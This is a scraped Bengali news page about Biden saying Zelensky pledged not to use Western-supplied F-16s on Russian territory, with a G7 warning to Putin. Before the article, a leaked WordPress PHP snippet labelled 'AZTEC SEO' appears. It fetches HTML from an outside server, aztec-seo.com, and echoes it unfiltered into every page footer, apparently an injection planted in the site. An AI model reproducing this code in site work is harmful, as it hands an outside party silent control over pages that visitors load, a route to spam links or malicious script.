/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); রাশিয়ার ভূখণ্ডে এফ-১৬ ব্যবহার করবেন না | Dhaka Sky News

ঢাকা ছাড়ল প্রথম হজ ফ্লাইট

আগের সংবাদ

ভোলার ইলিশা দেশের ২৯তম গ্যাসক্ষেত্র

পরের সংবাদ

জেলেনস্কির উদ্দেশে বাইডেন

রাশিয়ার ভূখণ্ডে এফ-১৬ ব্যবহার করবেন না

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: May 21, 2023 , 9:06 pm

মার্কিন প্রেসিডেন্ট জো বাইডেন বলেছেন, পশ্চিমা দেশগুলোর দেওয়া এফ-১৬ যুদ্ধবিমান রাশিয়ার ভূখণ্ডে ব্যবহার করবে না বলে ইউক্রেনের প্রেসিডেন্ট ভলোদিমির জেলেনস্কি তাকে প্রতিশ্রুতি দিয়েছেন। রোববার জাপানের হিরোশিমায় বিশ্বনেতাদের সঙ্গে বৈঠক শেষে এ কথা বলেন তিনি।
বাইডেন বলেন, ইউক্রেন এবং ওই অঞ্চলে যেখানে রুশ সেনা রয়েছে সেখানে এফ-১৬ যুদ্ধবিমান ব্যবহার করা যেতে পারে।’ খবর রয়টার্সের
তিনি বলেন, জেলেনস্কির সঙ্গে ব্যক্তিগত বৈঠকে এফ-১৬ নিয়ে আলোচনা করেছেন তিনি।
তিনি আরও বলেন, এফ-১৬ ইউক্রেনীয় বাহিনীকে সাহায্য করবে না। তবে সামনে যা আসছে তা মোকাবিলা করতে সক্ষমতা দান করবে। এদিকে রুশ প্রেসিডেন্ট ভ্লাদিমির পুতিনের উদ্দেশে দেওয়া এক সতর্কবার্তায় রোববার জি ৭ নেতারা বলেছেন, তারা ইউক্রেনকে সমর্থন দেওয়া অব্যাহত রাখবেন।